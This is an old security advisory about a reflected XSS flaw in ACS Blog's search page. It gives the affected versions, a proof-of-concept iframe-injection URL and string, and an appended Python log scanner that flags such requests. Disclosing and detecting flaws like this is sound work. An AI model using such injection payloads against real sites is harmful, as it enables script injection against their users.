XSS in ACS blog

2005-03-18T00:00:00
ID SECURITYVULNS:DOC:8094
Type securityvulns
Reporter Securityvulns
Modified 2005-03-18T00:00:00

Description

An XSS vulnerability exists in ACS Blog (ASP WEBLOG SYSTEM), in the search parameter of /search.asp.

Vulnerable:

ACS Blog v 0.8, ACS Blog v 0.9, ACS Blog v 1.0, ACS Blog v 1.1b

Code :

/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

Or go to /search.asp and paste this code: "<br><iframe src="http://google.com"></iframe>

Vendor URL : http://www.asppress.com
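
A defender-side check for the request pattern shown under "Code", as an added example that is not part of the original advisory: it scans access-log lines for /search.asp requests whose decoded search value contains an HTML tag opener. The log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed, simplified log lines (date time method target status); they are
# not from the advisory. The second one carries the advisory's test string.
SAMPLE_LOG = [
    "2005-03-18 10:01:02 GET /search.asp?search=holiday+photos 200",
    "2005-03-18 10:01:09 GET /search.asp?search=%22%3Cbr%3E%3Ciframe+src"
    "%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E 200",
    "2005-03-18 10:02:30 GET /default.asp?id=4 200",
    "2005-03-18 10:03:11 GET /search.asp?search=a+%3C+b 200",
]

# "<" directly followed by a letter, "/" or "!" starts a tag or comment in an
# HTML parser; a lone "<" (as in "a < b") does not and is left alone.
TAG_OPENER = re.compile(r"<[A-Za-z/!]")

def suspicious_search_values(target):
    """Return decoded 'search' values of a /search.asp request that hold markup."""
    parts = urlsplit(target)
    # IIS paths and ASP query-string keys are case-insensitive.
    if not parts.path.lower().endswith("/search.asp"):
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # decodes %XX and +
    return [v for k, v in pairs if k.lower() == "search" and TAG_OPENER.search(v)]

def scan(lines):
    """Return (timestamp, decoded value) for every flagged log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # not in the assumed layout
        for value in suspicious_search_values(fields[3]):
            hits.append((f"{fields[0]} {fields[1]}", value))
    return hits

if __name__ == "__main__":
    for when, value in scan(SAMPLE_LOG):
        print(when, repr(value))
```

A hit only shows that markup was submitted to the search page; whether it was reflected unencoded depends on the installed ACS Blog version.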